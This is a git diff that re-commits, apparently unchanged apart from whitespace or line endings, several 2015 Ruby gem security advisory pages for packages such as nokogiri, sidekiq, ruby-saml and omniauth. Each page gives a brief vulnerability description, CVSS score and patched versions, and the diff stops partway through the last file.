diff --git a/advisories/_posts/2015-04-14-CVE-2015-1819.md b/advisories/_posts/2015-04-14-CVE-2015-1819.md
index 6a6740a7..77ed9446 100644
--- a/advisories/_posts/2015-04-14-CVE-2015-1819.md
+++ b/advisories/_posts/2015-04-14-CVE-2015-1819.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2015-1819 (nokogiri): Nokogiri gem contains several vulnerabilities in
-  libxml2 and libxslt'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2015-1819
-  ghsa: q7wx-62r7-j2x7
-  url: https://github.com/sparklemotion/nokogiri/issues/1374
-  title: Nokogiri gem contains several vulnerabilities in libxml2 and libxslt
-  date: 2015-04-14
-  description: |
-    Several vulnerabilities were discovered in the libxml2 and libxslt libraries
-    that the Nokogiri gem depends on.
-
-    CVE-2015-1819
-    A denial of service flaw was found in the way libxml2 parsed XML
-    documents. This flaw could cause an application that uses libxml2 to use an
-    excessive amount of memory.
-
-    CVE-2015-7941
-    libxml2 does not properly stop parsing invalid input, which allows
-    context-dependent attackers to cause a denial of service (out-of-bounds read
-    and libxml2 crash) via crafted specially XML data.
-
-    CVE-2015-7942
-    The xmlParseConditionalSections function in parser.c in libxml2
-    does not properly skip intermediary entities when it stops parsing invalid
-    input, which allows context-dependent attackers to cause a denial of service
-    (out-of-bounds read and crash) via crafted XML data.
-
-    CVE-2015-7995
-    The xsltStylePreCompute function in preproc.c in libxslt 1.1.28 does not
-    check whether the parent node is an element, which allows attackers to cause
-    a denial of service using a specially crafted XML document.
-
-    CVE-2015-8035
-    The xz_decomp function in xzlib.c in libxml2 2.9.1 does not
-    properly detect compression errors, which allows context-dependent attackers
-    to cause a denial of service (process hang) via crafted XML data.
-
-    Another vulnerability was discoverd in libxml2 that could cause parsing
-    of unclosed comments to result in "conditional jump or move depends on
-    uninitialized value(s)" and unsafe memory access. This issue does not have a
-    CVE assigned yet. See related URLs for details. Patched in v1.6.7.rc4.
-  patched_versions:
-  - "~> 1.6.6.4"
-  - ">= 1.6.7.rc4"
-  related:
-    cve:
-    - 2015-7941
-    - 2015-7942
-    - 2015-7995
-    - 2015-8035
-    url:
-    - https://github.com/sparklemotion/nokogiri/pull/1376
-    - https://github.com/sparklemotion/nokogiri/commit/8f3de6d88d0da11fb62a45daa61b85ce71b4af59
----
+---
+layout: advisory
+title: 'CVE-2015-1819 (nokogiri): Nokogiri gem contains several vulnerabilities in
+  libxml2 and libxslt'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2015-1819
+  ghsa: q7wx-62r7-j2x7
+  url: https://github.com/sparklemotion/nokogiri/issues/1374
+  title: Nokogiri gem contains several vulnerabilities in libxml2 and libxslt
+  date: 2015-04-14
+  description: |
+    Several vulnerabilities were discovered in the libxml2 and libxslt libraries
+    that the Nokogiri gem depends on.
+
+    CVE-2015-1819
+    A denial of service flaw was found in the way libxml2 parsed XML
+    documents. This flaw could cause an application that uses libxml2 to use an
+    excessive amount of memory.
+
+    CVE-2015-7941
+    libxml2 does not properly stop parsing invalid input, which allows
+    context-dependent attackers to cause a denial of service (out-of-bounds read
+    and libxml2 crash) via crafted specially XML data.
+
+    CVE-2015-7942
+    The xmlParseConditionalSections function in parser.c in libxml2
+    does not properly skip intermediary entities when it stops parsing invalid
+    input, which allows context-dependent attackers to cause a denial of service
+    (out-of-bounds read and crash) via crafted XML data.
+
+    CVE-2015-7995
+    The xsltStylePreCompute function in preproc.c in libxslt 1.1.28 does not
+    check whether the parent node is an element, which allows attackers to cause
+    a denial of service using a specially crafted XML document.
+
+    CVE-2015-8035
+    The xz_decomp function in xzlib.c in libxml2 2.9.1 does not
+    properly detect compression errors, which allows context-dependent attackers
+    to cause a denial of service (process hang) via crafted XML data.
+
+    Another vulnerability was discoverd in libxml2 that could cause parsing
+    of unclosed comments to result in "conditional jump or move depends on
+    uninitialized value(s)" and unsafe memory access. This issue does not have a
+    CVE assigned yet. See related URLs for details. Patched in v1.6.7.rc4.
+  patched_versions:
+  - "~> 1.6.6.4"
+  - ">= 1.6.7.rc4"
+  related:
+    cve:
+    - 2015-7941
+    - 2015-7942
+    - 2015-7995
+    - 2015-8035
+    url:
+    - https://github.com/sparklemotion/nokogiri/pull/1376
+    - https://github.com/sparklemotion/nokogiri/commit/8f3de6d88d0da11fb62a45daa61b85ce71b4af59
+---
diff --git a/advisories/_posts/2015-04-14-CVE-2015-1866.md b/advisories/_posts/2015-04-14-CVE-2015-1866.md
index bc01e298..a6c81762 100644
--- a/advisories/_posts/2015-04-14-CVE-2015-1866.md
+++ b/advisories/_posts/2015-04-14-CVE-2015-1866.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2015-1866 (ember-source): Ember.js XSS Vulnerability With {{view "select"}}
-  Options'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2015-1866
-  ghsa: mp78-r56v-45qc
-  url: https://groups.google.com/forum/#!topic/ember-security/nbntfs2EbRU
-  title: Ember.js XSS Vulnerability With {{view "select"}} Options
-  date: 2015-04-14
-  description: |
-    In general, Ember.js escapes or strips any user-supplied content before
-    inserting it in strings that will be sent to innerHTML.  However, a
-    change made to the implementation of the select view means that any
-    user-supplied data bound to an option's label will not be escaped
-    correctly.
-
-    In applications that use Ember's select view and pass user-supplied
-    content to the label, a specially-crafted payload could execute
-    arbitrary JavaScript in the context of the current domain ("XSS").
-
-    All users running an affected release and binding user-supplied data to
-    the select options should either upgrade or use one of the workarounds
-    immediately.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 1.10.0"
-  patched_versions:
-  - "~> 1.10.1"
-  - "~> 1.11.2"
-  - ">= 1.12.0"
----
+---
+layout: advisory
+title: 'CVE-2015-1866 (ember-source): Ember.js XSS Vulnerability With {{view "select"}}
+  Options'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2015-1866
+  ghsa: mp78-r56v-45qc
+  url: https://groups.google.com/forum/#!topic/ember-security/nbntfs2EbRU
+  title: Ember.js XSS Vulnerability With {{view "select"}} Options
+  date: 2015-04-14
+  description: |
+    In general, Ember.js escapes or strips any user-supplied content before
+    inserting it in strings that will be sent to innerHTML.  However, a
+    change made to the implementation of the select view means that any
+    user-supplied data bound to an option's label will not be escaped
+    correctly.
+
+    In applications that use Ember's select view and pass user-supplied
+    content to the label, a specially-crafted payload could execute
+    arbitrary JavaScript in the context of the current domain ("XSS").
+
+    All users running an affected release and binding user-supplied data to
+    the select options should either upgrade or use one of the workarounds
+    immediately.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 1.10.0"
+  patched_versions:
+  - "~> 1.10.1"
+  - "~> 1.11.2"
+  - ">= 1.12.0"
+---
diff --git a/advisories/_posts/2015-04-15-OSVDB-120857.md b/advisories/_posts/2015-04-15-OSVDB-120857.md
index 32ed8450..617acbf2 100644
--- a/advisories/_posts/2015-04-15-OSVDB-120857.md
+++ b/advisories/_posts/2015-04-15-OSVDB-120857.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-120857 (refile): refile Gem for Ruby contains a remote code execution
-  vulnerability'
-comments: false
-categories:
-- refile
-advisory:
-  gem: refile
-  osvdb: 120857
-  url: https://groups.google.com/g/ruby-security-ann/c/VIfMO2LvzNs
-  title: refile Gem for Ruby contains a remote code execution vulnerability
-  date: 2015-04-15
-  description: |
-    refile Gem for Ruby contains a flaw that is triggered when input is not
-    sanitized when handling the 'remote_image_url' field in a form, where
-    'image' is the name of the attachment. This may allow a remote attacker
-    to execute arbitrary shell commands.
-  unaffected_versions:
-  - "< 0.5.0"
-  patched_versions:
-  - ">= 0.5.4"
-  related:
-    url:
-    - https://groups.google.com/g/ruby-security-ann/c/VIfMO2LvzNs
----
+---
+layout: advisory
+title: 'OSVDB-120857 (refile): refile Gem for Ruby contains a remote code execution
+  vulnerability'
+comments: false
+categories:
+- refile
+advisory:
+  gem: refile
+  osvdb: 120857
+  url: https://groups.google.com/g/ruby-security-ann/c/VIfMO2LvzNs
+  title: refile Gem for Ruby contains a remote code execution vulnerability
+  date: 2015-04-15
+  description: |
+    refile Gem for Ruby contains a flaw that is triggered when input is not
+    sanitized when handling the 'remote_image_url' field in a form, where
+    'image' is the name of the attachment. This may allow a remote attacker
+    to execute arbitrary shell commands.
+  unaffected_versions:
+  - "< 0.5.0"
+  patched_versions:
+  - ">= 0.5.4"
+  related:
+    url:
+    - https://groups.google.com/g/ruby-security-ann/c/VIfMO2LvzNs
+---
diff --git a/advisories/_posts/2015-04-21-OSVDB-125678.md b/advisories/_posts/2015-04-21-OSVDB-125678.md
index 5ea6dbd9..48826926 100644
--- a/advisories/_posts/2015-04-21-OSVDB-125678.md
+++ b/advisories/_posts/2015-04-21-OSVDB-125678.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-125678 (sidekiq): Sidekiq Gem for Ruby web/views/queue.erb msg.display_class
-  Element XSS'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  osvdb: 125678
-  url: https://seclists.org/oss-sec/2015/q3/267
-  title: Sidekiq Gem for Ruby web/views/queue.erb msg.display_class Element XSS
-  date: 2015-04-21
-  description: 'XSS via job arguments display class in Sidekiq::Web
-
-    '
-  patched_versions:
-  - ">= 3.4.0"
-  related:
-    url:
-    - https://seclists.org/oss-sec/2015/q3/267
-    - https://github.com/mperham/sidekiq/pull/2309
-    - https://github.com/sidekiq/sidekiq/commit/54766f336620ca0ce3b0b87a7a56382496e64b61
----
+---
+layout: advisory
+title: 'OSVDB-125678 (sidekiq): Sidekiq Gem for Ruby web/views/queue.erb msg.display_class
+  Element XSS'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  osvdb: 125678
+  url: https://seclists.org/oss-sec/2015/q3/267
+  title: Sidekiq Gem for Ruby web/views/queue.erb msg.display_class Element XSS
+  date: 2015-04-21
+  description: 'XSS via job arguments display class in Sidekiq::Web
+
+    '
+  patched_versions:
+  - ">= 3.4.0"
+  related:
+    url:
+    - https://seclists.org/oss-sec/2015/q3/267
+    - https://github.com/mperham/sidekiq/pull/2309
+    - https://github.com/sidekiq/sidekiq/commit/54766f336620ca0ce3b0b87a7a56382496e64b61
+---
diff --git a/advisories/_posts/2015-04-29-CVE-2015-20108.md b/advisories/_posts/2015-04-29-CVE-2015-20108.md
index 31709554..26312a8e 100644
--- a/advisories/_posts/2015-04-29-CVE-2015-20108.md
+++ b/advisories/_posts/2015-04-29-CVE-2015-20108.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2015-20108 (ruby-saml): ruby-saml gem is vulnerable to XPath injection'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  osvdb: 124991
-  cve: 2015-20108
-  ghsa: r364-2pj4-pf7f
-  url: https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20217
-  title: ruby-saml gem is vulnerable to XPath injection
-  date: 2015-04-29
-  description: |
-    xml_security.rb in the ruby-saml gem before 1.0.0 for Ruby
-    allows XPath injection and code execution because prepared
-    statements are not used.
-
-    The lack of prepared statements allows for possibly command
-    injection, leading to arbitrary code execution.
-  cvss_v2: 6.7
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-20108
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
-    - https://github.com/SAML-Toolkits/ruby-saml/pull/225
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/9853651b96b99653ea8627d757d46bfe62ab6448
-    - https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20217
-    - https://www.mend.io/vulnerability-database/WS-2015-0036
-    - https://github.com/advisories/GHSA-r364-2pj4-pf7f
----
+---
+layout: advisory
+title: 'CVE-2015-20108 (ruby-saml): ruby-saml gem is vulnerable to XPath injection'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  osvdb: 124991
+  cve: 2015-20108
+  ghsa: r364-2pj4-pf7f
+  url: https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20217
+  title: ruby-saml gem is vulnerable to XPath injection
+  date: 2015-04-29
+  description: |
+    xml_security.rb in the ruby-saml gem before 1.0.0 for Ruby
+    allows XPath injection and code execution because prepared
+    statements are not used.
+
+    The lack of prepared statements allows for possibly command
+    injection, leading to arbitrary code execution.
+  cvss_v2: 6.7
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-20108
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
+    - https://github.com/SAML-Toolkits/ruby-saml/pull/225
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/9853651b96b99653ea8627d757d46bfe62ab6448
+    - https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20217
+    - https://www.mend.io/vulnerability-database/WS-2015-0036
+    - https://github.com/advisories/GHSA-r364-2pj4-pf7f
+---
diff --git a/advisories/_posts/2015-04-29-CVE-2015-3448.md b/advisories/_posts/2015-04-29-CVE-2015-3448.md
index 5b964047..abfdee0d 100644
--- a/advisories/_posts/2015-04-29-CVE-2015-3448.md
+++ b/advisories/_posts/2015-04-29-CVE-2015-3448.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2015-3448 (rest-client): rest-client ruby gem logs sensitive information'
-comments: false
-categories:
-- rest-client
-advisory:
-  gem: rest-client
-  cve: 2015-3448
-  ghsa: mx9f-w8qq-q5jf
-  url: https://github.com/rest-client/rest-client/issues/349
-  title: rest-client ruby gem logs sensitive information
-  date: 2015-04-29
-  description: |
-    REST client for Ruby (aka rest-client) before 1.7.3 logs usernames and
-    passwords, which allows local users to obtain sensitive information by reading the
-    log.
-  cvss_v2: 2.1
-  patched_versions:
-  - ">= 1.7.3"
----
+---
+layout: advisory
+title: 'CVE-2015-3448 (rest-client): rest-client ruby gem logs sensitive information'
+comments: false
+categories:
+- rest-client
+advisory:
+  gem: rest-client
+  cve: 2015-3448
+  ghsa: mx9f-w8qq-q5jf
+  url: https://github.com/rest-client/rest-client/issues/349
+  title: rest-client ruby gem logs sensitive information
+  date: 2015-04-29
+  description: |
+    REST client for Ruby (aka rest-client) before 1.7.3 logs usernames and
+    passwords, which allows local users to obtain sensitive information by reading the
+    log.
+  cvss_v2: 2.1
+  patched_versions:
+  - ">= 1.7.3"
+---
diff --git a/advisories/_posts/2015-05-05-CVE-2015-3649.md b/advisories/_posts/2015-05-05-CVE-2015-3649.md
index 27bc76df..a24df4cf 100644
--- a/advisories/_posts/2015-05-05-CVE-2015-3649.md
+++ b/advisories/_posts/2015-05-05-CVE-2015-3649.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2015-3649 (open-uri-cached): open-uri-cached Gem for Ruby Unsafe Temporary
-  File Creation Local Privilege Escalation'
-comments: false
-categories:
-- open-uri-cached
-advisory:
-  gem: open-uri-cached
-  cve: 2015-3649
-  osvdb: 121701
-  ghsa: 7m2w-9gw7-c3xp
-  url: http://seclists.org/oss-sec/2015/q2/373
-  title: open-uri-cached Gem for Ruby Unsafe Temporary File Creation Local Privilege
-    Escalation
-  date: 2015-05-05
-  description: |
-    open-uri-cached Gem for Ruby contains a flaw that is due to the
-    program creating temporary files in a predictable, unsafe manner when using
-    YAML. This may allow a local attacker to gain elevated privileges.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2015-3649 (open-uri-cached): open-uri-cached Gem for Ruby Unsafe Temporary
+  File Creation Local Privilege Escalation'
+comments: false
+categories:
+- open-uri-cached
+advisory:
+  gem: open-uri-cached
+  cve: 2015-3649
+  osvdb: 121701
+  ghsa: 7m2w-9gw7-c3xp
+  url: http://seclists.org/oss-sec/2015/q2/373
+  title: open-uri-cached Gem for Ruby Unsafe Temporary File Creation Local Privilege
+    Escalation
+  date: 2015-05-05
+  description: |
+    open-uri-cached Gem for Ruby contains a flaw that is due to the
+    program creating temporary files in a predictable, unsafe manner when using
+    YAML. This may allow a local attacker to gain elevated privileges.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2015-05-11-OSVDB-126329.md b/advisories/_posts/2015-05-11-OSVDB-126329.md
index ccbddb1e..ce06c6c3 100644
--- a/advisories/_posts/2015-05-11-OSVDB-126329.md
+++ b/advisories/_posts/2015-05-11-OSVDB-126329.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-126329 (sidekiq-pro): Sidekiq Pro Gem for Ruby web/views/batch.erb Class
-  and ErrorMessage Elements Reflected XSS'
-comments: false
-categories:
-- sidekiq-pro
-advisory:
-  gem: sidekiq-pro
-  osvdb: 126329
-  url: https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#202
-  title: Sidekiq Pro Gem for Ruby web/views/batch.erb Class and ErrorMessage Elements
-    Reflected XSS
-  date: 2015-05-11
-  description: 'XSS via batch failure error_class and error_message in Sidekiq::Web
-
-    '
-  patched_versions:
-  - ">= 2.0.2"
-  related:
-    url:
-    - https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#202
-    - https://github.com/mperham/sidekiq/commit/a695ff347ae50f641dfc35189131b232ea0aa1db
-    - https://github.com/sidekiq/sidekiq/issues/2467
-    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20219
----
+---
+layout: advisory
+title: 'OSVDB-126329 (sidekiq-pro): Sidekiq Pro Gem for Ruby web/views/batch.erb Class
+  and ErrorMessage Elements Reflected XSS'
+comments: false
+categories:
+- sidekiq-pro
+advisory:
+  gem: sidekiq-pro
+  osvdb: 126329
+  url: https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#202
+  title: Sidekiq Pro Gem for Ruby web/views/batch.erb Class and ErrorMessage Elements
+    Reflected XSS
+  date: 2015-05-11
+  description: 'XSS via batch failure error_class and error_message in Sidekiq::Web
+
+    '
+  patched_versions:
+  - ">= 2.0.2"
+  related:
+    url:
+    - https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#202
+    - https://github.com/mperham/sidekiq/commit/a695ff347ae50f641dfc35189131b232ea0aa1db
+    - https://github.com/sidekiq/sidekiq/issues/2467
+    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20219
+---
diff --git a/advisories/_posts/2015-05-14-CVE-2015-3900.md b/advisories/_posts/2015-05-14-CVE-2015-3900.md
index 740257db..07fb8187 100644
--- a/advisories/_posts/2015-05-14-CVE-2015-3900.md
+++ b/advisories/_posts/2015-05-14-CVE-2015-3900.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2015-3900 (rubygems-update): CVE-2015-3900 rubygems: DNS hijacking vulnerability
-  in api_endpoint()'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2015-3900
-  osvdb: 122162
-  ghsa: wp3j-rvfp-624h
-  url: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356
-  title: 'CVE-2015-3900 rubygems: DNS hijacking vulnerability in api_endpoint()'
-  date: 2015-05-14
-  description: |
-    RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7
-    does not validate the hostname when fetching gems or making API requests, which
-    allows remote attackers to redirect requests to arbitrary domains via a crafted
-    DNS SRV record, aka a "DNS hijack attack." A flaw was found in a way rubygems verified
-    the API endpoint hostname retrieved through a DNS SRV record. A man-in-the-middle
-    attacker could use this flaw to force a client to download content from an untrusted
-    domain.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 2.0.16"
-  - "~> 2.2.4"
-  - ">= 2.4.7"
----
+---
+layout: advisory
+title: 'CVE-2015-3900 (rubygems-update): CVE-2015-3900 rubygems: DNS hijacking vulnerability
+  in api_endpoint()'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2015-3900
+  osvdb: 122162
+  ghsa: wp3j-rvfp-624h
+  url: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356
+  title: 'CVE-2015-3900 rubygems: DNS hijacking vulnerability in api_endpoint()'
+  date: 2015-05-14
+  description: |
+    RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7
+    does not validate the hostname when fetching gems or making API requests, which
+    allows remote attackers to redirect requests to arbitrary domains via a crafted
+    DNS SRV record, aka a "DNS hijack attack." A flaw was found in a way rubygems verified
+    the API endpoint hostname retrieved through a DNS SRV record. A man-in-the-middle
+    attacker could use this flaw to force a client to download content from an untrusted
+    domain.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 2.0.16"
+  - "~> 2.2.4"
+  - ">= 2.4.7"
+---
diff --git a/advisories/_posts/2015-05-25-CVE-2015-9284.md b/advisories/_posts/2015-05-25-CVE-2015-9284.md
index a406d8b6..ccdb0ddf 100644
--- a/advisories/_posts/2015-05-25-CVE-2015-9284.md
+++ b/advisories/_posts/2015-05-25-CVE-2015-9284.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2015-9284 (omniauth): CSRF vulnerability in OmniAuth''s request phase'
-comments: false
-categories:
-- omniauth
-advisory:
-  gem: omniauth
-  cve: 2015-9284
-  ghsa: ww4x-rwq6-qpgf
-  url: https://github.com/omniauth/omniauth/wiki/Resolving-CVE-2015-9284
-  title: CSRF vulnerability in OmniAuth's request phase
-  date: 2015-05-25
-  description: |
-    The request phase of the OmniAuth Ruby gem is vulnerable to Cross-Site
-    Request Forgery (CSRF) when used as part of the Ruby on Rails framework, allowing
-    accounts to be connected without user intent, user interaction, or feedback to
-    the user. This permits a secondary account to be able to sign into the web
-    application as the primary account.
-
-    In order to mitigate this vulnerability, Rails users should consider using the
-    `omniauth-rails_csrf_protection` gem.
-
-    More info is available here: https://github.com/omniauth/omniauth/wiki/Resolving-CVE-2015-9284
-  cvss_v2: 6.8
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 2.0.0"
-  related:
-    url:
-    - https://github.com/omniauth/omniauth/pull/809
-    - https://github.com/cookpad/omniauth-rails_csrf_protection
----
+---
+layout: advisory
+title: 'CVE-2015-9284 (omniauth): CSRF vulnerability in OmniAuth''s request phase'
+comments: false
+categories:
+- omniauth
+advisory:
+  gem: omniauth
+  cve: 2015-9284
+  ghsa: ww4x-rwq6-qpgf
+  url: https://github.com/omniauth/omniauth/wiki/Resolving-CVE-2015-9284
+  title: CSRF vulnerability in OmniAuth's request phase
+  date: 2015-05-25
+  description: |
+    The request phase of the OmniAuth Ruby gem is vulnerable to Cross-Site
+    Request Forgery (CSRF) when used as part of the Ruby on Rails framework, allowing
+    accounts to be connected without user intent, user interaction, or feedback to
+    the user. This permits a secondary account to be able to sign into the web
+    application as the primary account.
+
+    In order to mitigate this vulnerability, Rails users should consider using the
+    `omniauth-rails_csrf_protection` gem.
+
+    More info is available here: https://github.com/omniauth/omniauth/wiki/Resolving-CVE-2015-9284
+  cvss_v2: 6.8
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 2.0.0"
+  related:
+    url:
+    - https://github.com/omniauth/omniauth/pull/809
+    - https://github.com/cookpad/omniauth-rails_csrf_protection
+---
diff --git a/advisories/_posts/2015-06-04-CVE-2015-4410.md b/advisories/_posts/2015-06-04-CVE-2015-4410.md
index e5e0634c..58e10a1d 100644
--- a/advisories/_posts/2015-06-04-CVE-2015-4410.md
+++ b/advisories/_posts/2015-06-04-CVE-2015-4410.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2015-4410 (moped): Data Injection Vulnerability in moped Rubygem'
-comments: false
-categories:
-- moped
-advisory:
-  gem: moped
-  cve: 2015-4410
-  ghsa: f93j-hmcr-jcwh
-  url: http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
-  title: Data Injection Vulnerability in moped Rubygem
-  date: 2015-06-04
-  description: |
-    A flaw in the ObjectId validation regular expression can enable attackers
-    to inject arbitrary information into a given BSON object.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 1.5.3"
-  - ">= 2.0.5"
-  related:
-    url:
-    - https://github.com/mongoid/moped/compare/e5fc928bcb5b7b89d171e31e31483be4185971b9...32cba17ad7d3da326778b4d8cd4b52e75bca9d40
-    - https://github.com/mongoid/moped/commit/276fbfd23c5ffb65e6bd18d564c8b6878c2498ac
----
+---
+layout: advisory
+title: 'CVE-2015-4410 (moped): Data Injection Vulnerability in moped Rubygem'
+comments: false
+categories:
+- moped
+advisory:
+  gem: moped
+  cve: 2015-4410
+  ghsa: f93j-hmcr-jcwh
+  url: http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
+  title: Data Injection Vulnerability in moped Rubygem
+  date: 2015-06-04
+  description: |
+    A flaw in the ObjectId validation regular expression can enable attackers
+    to inject arbitrary information into a given BSON object.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 1.5.3"
+  - ">= 2.0.5"
+  related:
+    url:
+    - https://github.com/mongoid/moped/compare/e5fc928bcb5b7b89d171e31e31483be4185971b9...32cba17ad7d3da326778b4d8cd4b52e75bca9d40
+    - https://github.com/mongoid/moped/commit/276fbfd23c5ffb65e6bd18d564c8b6878c2498ac
+---
diff --git a/advisories/_posts/2015-06-04-CVE-2015-4412.md b/advisories/_posts/2015-06-04-CVE-2015-4412.md
index 101cfc72..be7327f0 100644
--- a/advisories/_posts/2015-06-04-CVE-2015-4412.md
+++ b/advisories/_posts/2015-06-04-CVE-2015-4412.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2015-4412 (bson): Data Injection Vulnerability in bson Rubygem'
-comments: false
-categories:
-- bson
-advisory:
-  gem: bson
-  cve: 2015-4412
-  ghsa: h6rj-8r3c-9gpj
-  url: http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
-  title: Data Injection Vulnerability in bson Rubygem
-  date: 2015-06-04
-  description: |
-    A flaw in the ObjectId validation regular expression can enable attackers
-    to inject arbitrary information into a given BSON object.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 1.12.3"
-  - ">= 3.0.4"
-  related:
-    url:
-    - https://github.com/mongodb/mongo-ruby-driver/compare/6ae981167759d5819ba3d41e374e5b2af5b79077~1...9859a3ab9773a8a883eb8438b665a921cc991c71
-    - https://github.com/mongodb/bson-ruby/compare/7446d7c6764dfda8dc4480ce16d5c023e74be5ca...28f34978a85b689a4480b4d343389bf4886522e7
----
+---
+layout: advisory
+title: 'CVE-2015-4412 (bson): Data Injection Vulnerability in bson Rubygem'
+comments: false
+categories:
+- bson
+advisory:
+  gem: bson
+  cve: 2015-4412
+  ghsa: h6rj-8r3c-9gpj
+  url: http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
+  title: Data Injection Vulnerability in bson Rubygem
+  date: 2015-06-04
+  description: |
+    A flaw in the ObjectId validation regular expression can enable attackers
+    to inject arbitrary information into a given BSON object.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 1.12.3"
+  - ">= 3.0.4"
+  related:
+    url:
+    - https://github.com/mongodb/mongo-ruby-driver/compare/6ae981167759d5819ba3d41e374e5b2af5b79077~1...9859a3ab9773a8a883eb8438b665a921cc991c71
+    - https://github.com/mongodb/bson-ruby/compare/7446d7c6764dfda8dc4480ce16d5c023e74be5ca...28f34978a85b689a4480b4d343389bf4886522e7
+---
diff --git a/advisories/_posts/2015-06-04-OSVDB-125676.md b/advisories/_posts/2015-06-04-OSVDB-125676.md
index 29b71507..bae99436 100644
--- a/advisories/_posts/2015-06-04-OSVDB-125676.md
+++ b/advisories/_posts/2015-06-04-OSVDB-125676.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-125676 (sidekiq): Sidekiq Gem for Ruby web/views/queue.erb Element Reflected
-  XSS'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  osvdb: 125676
-  url: https://seclists.org/oss-sec/2015/q3/267
-  title: Sidekiq Gem for Ruby web/views/queue.erb Element Reflected XSS
-  date: 2015-06-04
-  description: |
-    Sidekiq Gem for Ruby web/views/queue.erb [CurrentMessagesInQueue,
-    AreYouSureDeleteQueue] Element Reflected XSS
-  patched_versions:
-  - ">= 3.4.0"
-  related:
-    osvdb:
-    - 125677
-    url:
-    - https://seclists.org/oss-sec/2015/q3/267
-    - https://github.com/mperham/sidekiq/issues/2330
-    - https://github.com/sidekiq/sidekiq/commit/2178d66b6686fbf4430223c34c184a64c9906828
-    - https://github.com/rubysec/ruby-advisory-db/pull/196
-    - https://github.com/rubysec/ruby-advisory-db/commit/19a8fc075a6cc0702f978219c88d97c666fecdbd
----
+---
+layout: advisory
+title: 'OSVDB-125676 (sidekiq): Sidekiq Gem for Ruby web/views/queue.erb Element Reflected
+  XSS'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  osvdb: 125676
+  url: https://seclists.org/oss-sec/2015/q3/267
+  title: Sidekiq Gem for Ruby web/views/queue.erb Element Reflected XSS
+  date: 2015-06-04
+  description: |
+    Sidekiq Gem for Ruby web/views/queue.erb [CurrentMessagesInQueue,
+    AreYouSureDeleteQueue] Element Reflected XSS
+  patched_versions:
+  - ">= 3.4.0"
+  related:
+    osvdb:
+    - 125677
+    url:
+    - https://seclists.org/oss-sec/2015/q3/267
+    - https://github.com/mperham/sidekiq/issues/2330
+    - https://github.com/sidekiq/sidekiq/commit/2178d66b6686fbf4430223c34c184a64c9906828
+    - https://github.com/rubysec/ruby-advisory-db/pull/196
